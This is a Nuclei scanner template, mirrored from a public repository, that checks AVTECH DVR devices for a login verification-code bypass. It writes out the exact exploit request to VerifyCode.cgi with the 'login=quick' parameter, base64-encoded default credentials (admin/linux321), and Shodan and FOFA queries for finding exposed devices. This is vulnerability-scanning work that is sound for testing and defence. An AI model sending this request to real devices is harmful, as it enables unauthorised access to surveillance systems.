mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-04 17:53:27 +08:00
39 lines
1.1 KiB
YAML
39 lines
1.1 KiB
YAML
id: avtech-verification-bypass
|
|
|
|
info:
|
|
name: AVTECH DVR - Login Verification Code Bypass
|
|
author: ritikchaddha
|
|
severity: low
|
|
description: |
|
|
AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"login" product:"Avtech"
|
|
fofa-query: app="AVTECH-视频监控"
|
|
tags: avtech,verify,bypass,iot
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
username:
|
|
- admin
|
|
password:
|
|
- linux321
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "^0.*\nOK.*"
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- status_code == 200
|
|
- len(body) == 5
|
|
condition: and
|
|
# digest: 4a0a0047304502205f413362a1e3950842936836d877ea1c33935d17ed79baa0a966368853b337ee022100842238711200f1943c20b955fe7d0eff277d4d1a8db567852cbef549d66ffb29:922c64590222798bb761d5b6d8e72950 |